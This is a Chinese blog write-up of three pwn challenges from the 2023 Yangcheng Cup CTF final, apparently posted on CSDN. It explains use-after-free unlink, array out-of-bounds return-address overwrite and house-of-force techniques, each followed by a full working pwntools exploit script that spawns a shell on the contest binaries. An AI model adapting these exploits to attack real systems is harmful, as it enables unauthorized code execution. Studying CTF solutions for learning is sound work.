2023羊城杯决赛 pwn

最新推荐文章于 2023-09-26 11:38:09 发布
最新推荐文章于 2023-09-26 11:38:09 发布
阅读量276 收藏 1
点赞数 2
文章标签: python 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/132943954
版权

Printf but not fmtstr

放入IDA分析
常规菜单题
在这里插入图片描述
在这里插入图片描述
发现在free中存在uaf
在这里插入图片描述
限制io攻击

在这里插入图片描述
没有开pie 堆地址存在固定位置上可以使用unlink攻击
脚本

from pwn import *

context.arch = 'amd64'

def gd():
 gdb.attach(p)
 pause()
def add(idx,size):
 p.recvuntil(b'>')
 p.sendline(b'1')
 p.recvuntil(b'Index: ')
 p.sendline(str(idx).encode())
 p.recvuntil(b'Size: ')
 p.sendline(str(size).encode())
def free(idx):
 p.recvuntil(b'>')
 p.sendline(b'2')
 p.recvuntil(b'Index: ')
 p.sendline(str(idx).encode())
def show(idx):
 p.recvuntil(b'>')
 p.sendline(b'4')
 p.recvuntil(b'Index: ')
 p.sendline(str(idx).encode()) 
def edit(idx,data):
 p.recvuntil(b'>')
 p.sendline(b'3')
 p.recvuntil(b'Index: ')
 p.sendline(str(idx).encode())
 p.recvuntil(b'Content: ')
 p.send(data) 
  
p = process("./pwn")
table = 0x4040e8
shell_addr = 0x4011d6
elf = ELF("./pwn")
add(0, 0x580)
add(1, 0x580)
add(2, 0x580)
free(0)
free(1)
paylaod = p64(0) + p64(0x581) + p64(table - 0x18) + p64(table - 0x10)
add(3,0x590)
edit(1, flat([0, 0x581, 0x4040E8 - 0x18, 0x4040E8 - 0x10]))
free(2)
#gd()
edit(1,p64(0) * 2 + p64(elf.got['free']))
edit(0,p64(shell_addr))
free(1)
p.interactive()

成功getshell
在这里插入图片描述

arrary_index_bank

没什么好说的数组越界
-7的位置上面存在函数返回地址
越界覆盖成后门地址
注意:直接覆盖成后门地址会因为对齐出问题所以应该跳过push命令以后

from pwn import *

context.arch = 'amd64'

def gd():
 gdb.attach(p)
 pause()

p = process("./pwn")
#p = remote('node4.anna.nssctf.cn',28658)
p.sendline(b'1')
p.sendline(b'-1')
p.recvuntil(b'accounts[-1] = ')
elf_base = int(p.recv(len('93915009242150'),16)) - 210 - 0x1327 - 0x2d
shell_addr = elf_base + 0x1315
print(hex(elf_base))
p.sendline(b'2')
p.sendline(str(-0x8000000000000000 + 7))
p.sendline('{:d}'.format(shell_addr).encode())
p.sendline(b'3')
p.interactive()

成功getshell
在这里插入图片描述
只开放了申请功能
下面泄露了堆地址

在这里插入图片描述
发现第一次申请一个巨大的块泄露地址,第二次可以申请小于0x30的堆块修改top块的大小。
第三次申请把malloc_got拿出来写上system第四次申请就成功getshell。
因为库版本是2.23没有对top块大小做检查所以可以正应了题目的名字(house of force)

在这里插入图片描述
成功修改大小

from pwn import *

context.arch = 'amd64'

def gd():
 gdb.attach(p)
 pause()
def add(idx,size,data):
 p.sendline(b'1')
 p.recvuntil(b'which index?')
 p.sendline(str(idx).encode())
 p.recvuntil(b'how much space do u want?')
 p.sendline(str(size).encode())
 p.recvuntil(b'now what to write?')
 p.send(data)
table = 0x00000000006020A0  
#p = process("./pwn")
elf = ELF("./pwn")
libc = ELF("/home/cforce/Desktop/libc.so.6")
p = remote('node4.anna.nssctf.cn',28053)
add(0,0x60000,b'\n')

p.recvuntil(b'the balckbroad on ')
libc_base = int(p.recv(14),16) - 0x58b010
malloc_hook = libc_base + libc.sym['__malloc_hook']
add(1,0x10,b'/bin/sh\x00'+ b'a' * 0x10 + p64(-1 & 0xffffffffffffffff))
p.recvuntil(b'the balckbroad on ')
top = int(p.recv(9),16)
sys_addr = libc_base + libc.sym['system']
print(hex(top))

print(elf.got['malloc'] - top)
add(2,elf.got['malloc'] - top - 0x30,b'a')
add(3,0x18,p64(sys_addr))
p.sendline(b'1')
p.sendline(b'4')
p.recvuntil(b'how much space do u want?')
p.sendline('{:d}'.format(top))
#gd()
p.interactive()

成功getshell
在这里插入图片描述

萌の鱼
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
CISCN 2023 初赛 pwn——Shellwego 题解
CoLin的pwn小屋
05-28 1834
CISCN 2023 初赛 pwn Shellwego题解
PWN · ret2text | RISC-V异构】[2023 羊城杯]login
Mr_Fmnwon的博客
09-03 708
我们context.arch经常是'i386'和'amd64',突然遇到RISC-V架构的题目,一是本地运行不了(环境没配),二是IDA无法反汇编。苦恼。一、食用工具于是找啊找。找到cutter——一款risc-v的反汇编反编译工具,然而太shi了,反编译的c代码看不了一点,全是错的。GhidraGhidra 是美国国家安全局(RSA)开源发布的软件逆向工程框架,涵盖了反汇编、反编译等工具。该工具2019年3月开源。与之对标的有windows平台下的IDA Pro和linux平台下的radare2等。
2023羊城杯--pwn-heap复现
fuiifiuiii的博客
09-26 264
​ 可以看到,配合new(0x62)或(0x68)以后,delete(这里仅仅是为了达成能够往下修改的效果),然后连续创建两个(0x58),可以覆盖0x60,然后刚好达到第二堆块的index_chunk区域,从而修改指针。另外:这里被free掉的堆块也不会被再次使用,能够正确覆写的原因就是这个堆管理的表(也就是用了第一个堆来存储用到的堆的数据域的地址)可能发现用它的过程:从strtok的调用中,si进入发现got表跳转的第一个函数是它,然后用libc找到相应的位置,进行更改。
第三届上海市大学生网络安全大赛 PWN200 WriteUp
s1054436218的博客
11-08 1780
这题利用了UAF漏洞,在pwnable.kr中有类似的题。简单介绍 一下什么事UAF,UAF就是use after free,就是在C++申请内存的机制中,如果上一次free掉的内存和新申请的内存大小相同,那么再次申请就会申请到刚才free掉的内存,于是例如本题中,结构体嵌套了函数,在再次申请到内存的时候,被覆盖掉原有的内存地址中,把shell的地址放到结构体调用的函数中,就会触发UAF漏洞,详情
CTF竞赛入门(八)pwn
single7_的博客
11-18 1017
0x01 pwn Pwn (/ˈpoʊn/, /ˈpuːn/, /pəˈʔoʊn/, /ˈpɔːn/, /piˈoʊn/, /pwəˈʔn̩/, /ˈoʊn/),是一个骇客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:“You just got pwned!”)。过去式的拼写可以拼成pwnd,pwn3d,pwnt(读成 t 这个音)或是
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
网鼎杯2020半决赛awdplus题目
12-07
"网鼎杯2020半决赛awdplus题目"是一个针对网络安全竞赛的专题,主要涉及的是Pwn(破解)和Web(网页安全)两类挑战。这类比赛通常旨在测试参赛者的逆向工程、代码审计、漏洞利用以及网络攻防技能。下面我们将详细...
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
2020YCBCTF:2020羊城杯官方writeup及
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
强网杯2022 pwn 赛题解析——yakacmp
CoLin的pwn小屋
08-07 1010
强网杯2022 pwn 赛题解析——yakacmp
第一届广东省大学生网络安全攻防大赛PWN Writeup
SkYe's Blog
05-24 3523
两个题目都是无输出堆题,最近一次比赛在 nepctf 遇到:https://www.mrskye.cn/archives/bdb75c49/#sooooeasy 思路方法概述:https://www.jianshu.com/p/fe28639e406e BabyNote 题目是基于 glibc 2.31 的菜单堆题。 漏洞出现在 free 之后没有置零指针导致的 UAF : 程序没有输出函数,倒是有一个提示的函数 gift 函数,输出堆地址最低两个字节,没用明白,到最后也不关他的事情。 思路: 利.
如何安全快速地部署多道ctf pwn比赛题目
giantbranch的专栏
10-09 5569
前言 一开始接触pwn的时候,我们要么本地调试,要么自己用socat将程序启动起来远程调试 最近去搞pwn培训,发现将pwn题一个一个部署起来还是比较繁琐,除了权限还要考虑其他东西 后来一顿搜索,看看有无别人的解决方案,发现一个xinted + docker的方案: https://github.com/Eadom/ctf_xinetd 但是对于这个我发现了一些缺点: 需要自己配置flag 需要...
2020第五空间智能安全大赛PWN——twice
baidu_36110484的博客
06-30 786
0x00背景 这次比赛中的一道pwn题,主要考察了栈迁移和泄露canary。之前没有接触过栈迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出一个字节,用于泄露canary和栈地址(用于之后的栈迁移),第二次输入可以溢出到返回地址,修改程序流程完成栈迁移,从而执行ROP链。 0x02 exp构造 需
CTF中pwn的入门指南
热门推荐
菜的只能随便写写博客
09-13 3万+
CTF中pwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言...
[网络安全自学篇] 二十一.GeekPwn 2019极客大赛之安全攻防技术总结及ShowTime
杨秀璋的专栏
11-04 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。这篇文章主要分享作者10月24日参加上海GeekPwn极客大赛的体会,包括各种安全技术、ShowTime及疑惑。作者尽量还原当时的现场情景,以观众第一视角,带着网络安全初学者的无数疑问,并查询资料分享一些技术点。写这篇文章不容易,花费了两部手机电量,许多笔记、照片和资料完成,希望您喜欢,不喜勿喷~
湖湘杯pwn400的wp
一个码农的笔记
12-09 2017
湖湘杯的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是: http://download.csdn.net/download/niexinming/10152069 把pwn400直接拖入ida中: main函数: Create Profile函数: Print Profile函数: Update Profile函数: Ex
2019国赛1.your_pwn
Jc
05-13 1279
1.文件属性
2023 羊城pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值